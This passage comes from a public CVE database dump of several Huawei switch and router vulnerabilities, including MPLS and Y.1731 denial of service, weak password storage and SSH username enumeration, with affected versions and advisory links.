                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Y.1731",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2014-3223",
      datePublished: "2017-04-02T20:00:00",
      dateReserved: "2014-05-05T00:00:00",
      dateUpdated: "2024-08-06T10:35:56.984Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2016-8773 (GCVE-0-2016-8773)
Vulnerability from cvelistv5
Published
2017-04-02 20:00
Modified
2024-08-06 02:35
Severity ?
Summary
Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets.
Impacted products
Vendor Product Version
n/a S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 Version: S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T02:35:00.177Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
               },
               {
                  name: "94285",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/94285",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00",
                  },
               ],
            },
         ],
         datePublic: "2017-03-27T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "input validation",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-04-03T09:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
            },
            {
               name: "94285",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/94285",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2016-8773",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "S5300,S5700,S6300,S6700,S7700,9300,9700,S12700 S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00,S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00,S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00,S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00,S7700 with software V200R007C00, V200R008C00, V200R009C00,S9300 with software V200R007C00, V200R008C00, V200R009C00,S9700 with software V200R007C00, V200R008C00, V200R009C00 and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "input validation",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
                  },
                  {
                     name: "94285",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/94285",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2016-8773",
      datePublished: "2017-04-02T20:00:00",
      dateReserved: "2016-10-18T00:00:00",
      dateUpdated: "2024-08-06T02:35:00.177Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2015-8086 (GCVE-0-2015-8086)
Vulnerability from cvelistv5
Published
2016-10-03 21:00
Modified
2024-08-06 08:13
Severity ?
Summary
Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T08:13:30.981Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "76897",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/76897",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2015-09-30T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2016-11-25T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "76897",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/76897",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2015-8086",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "76897",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/76897",
                  },
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2015-8086",
      datePublished: "2016-10-03T21:00:00",
      dateReserved: "2015-11-06T00:00:00",
      dateUpdated: "2024-08-06T08:13:30.981Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2012-4960 (GCVE-0-2012-4960)
Vulnerability from cvelistv5
Published
2013-06-20 15:00
Modified
2024-08-06 20:50
Severity ?
Summary
The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T20:50:18.270Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "VU#948096",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_CERT-VN",
                     "x_transferred",
                  ],
                  url: "http://www.kb.cert.org/vuls/id/948096",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-12-17T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2013-08-22T09:00:00",
            orgId: "37e5125f-f79b-445b-8fad-9564f167944b",
            shortName: "certcc",
         },
         references: [
            {
               name: "VU#948096",
               tags: [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
               ],
               url: "http://www.kb.cert.org/vuls/id/948096",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cert@cert.org",
               ID: "CVE-2012-4960",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "VU#948096",
                     refsource: "CERT-VN",
                     url: "http://www.kb.cert.org/vuls/id/948096",
                  },
                  {
                     name: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "37e5125f-f79b-445b-8fad-9564f167944b",
      assignerShortName: "certcc",
      cveId: "CVE-2012-4960",
      datePublished: "2013-06-20T15:00:00",
      dateReserved: "2012-09-17T00:00:00",
      dateUpdated: "2024-08-06T20:50:18.270Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2015-8085 (GCVE-0-2015-8085)
Vulnerability from cvelistv5
Published
2016-10-03 21:00
Modified
2024-08-06 08:13
Severity ?
Summary
Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T08:13:30.940Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "76897",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/76897",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2015-09-30T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2016-11-25T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "76897",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/76897",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2015-8085",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "76897",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/76897",
                  },
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2015-8085",
      datePublished: "2016-10-03T21:00:00",
      dateReserved: "2015-11-06T00:00:00",
      dateUpdated: "2024-08-06T08:13:30.940Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2014-5394 (GCVE-0-2014-5394)
Vulnerability from cvelistv5
Published
2018-01-08 19:00
Modified
2024-08-06 11:41
Severity ?
Summary
Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T11:41:49.182Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "69302",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/69302",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
               },
               {
                  name: "campusswitch-cve20145394-info-disc(97763)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2014-08-20T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-08T18:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "69302",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/69302",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
            },
            {
               name: "campusswitch-cve20145394-info-disc(97763)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2014-5394",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "69302",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/69302",
                  },
                  {
                     name: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
                  },
                  {
                     name: "campusswitch-cve20145394-info-disc(97763)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2014-5394",
      datePublished: "2018-01-08T19:00:00",
      dateReserved: "2014-08-22T00:00:00",
      dateUpdated: "2024-08-06T11:41:49.182Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2016-3678 (GCVE-0-2016-3678)
Vulnerability from cvelistv5
Published
2016-04-11 15:00
Modified
2024-08-06 00:03
Severity ?
Summary
Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T00:03:34.462Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
